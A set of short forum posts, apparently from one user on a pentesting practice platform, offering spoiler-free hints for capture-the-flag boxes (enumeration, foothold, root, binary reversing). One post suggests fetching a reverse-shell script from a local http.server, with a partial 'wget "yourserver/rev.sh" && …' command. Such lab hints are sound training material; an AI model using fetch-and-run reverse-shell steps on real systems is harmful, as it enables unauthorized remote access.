Took me a day to solve it without any tooling (besides IDA and its embedded debugger). At first it may seem a bit complex but as you start pulling the string it becomes more and more evident what you need to actually bypass.
Check the file entry po…
Oh my lord, my first hard box !
Dude, never messed with almost any of this things but bit by bit i was able to progress (not fast, but progress at least). Took me a WHOLE week, but i assume that when familiar with the technologies is not something …
Foothold: Simple enumeration leads you there. It's ugly to do, but you might need to steal something! If you don't know what to steal, check around what you can do and see.
User: Not difficult, the standard enumeration should lead you where you ne…
Quite a ride, got it in the end.
If somebody is asking why it does work locally, try it in 32bit system. In mine (64bit) it was not working and a new vm did the trick for testing
If you need help reach out to me
Nice box, very good to mess with stuff that i never did before!
Foothold: Well, a must check pentesting procedure should lead you there. If you never messed with it (like me) search for that typ key :)
User: Did you checked everything before getti…
Well, i took a bit more time since i never read c++ code (nor its assembly form) but the solution is way easier (and less time consuming) to get than by brute forcing it !
That one simple instruction in the middle of it needed a bit of attention !
Hey guys, thanks a lot !
I did the academy windows fundamentals and it was pretty straight forward!
Guess i'll upgrade to VIP just to start messing with easy boxes together with some reading on those subjects you suggested
Rooted, quite an easy box actually!
Foothold: check the request and play with it
User: old vulnerability, search for it
Root: Never played with go, but i think its doable with a bit of research. When exploiting binaries what is the most useful thi…
simple enumeration will guide you in the right place
Enum the right place
And you already have it
Easiest part. the traditional scritps will bloat your screen, you should notice that! (examine the folder. y…
What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems
this approach got me good: wget "yourserver/rev.sh" && …
why am i so distracted and overlook things???
Contrary to everyone, the user was easier than the root !
Might be luck but, things just went the right path (even not using docker prior to this)...
* look carefully (enumeration)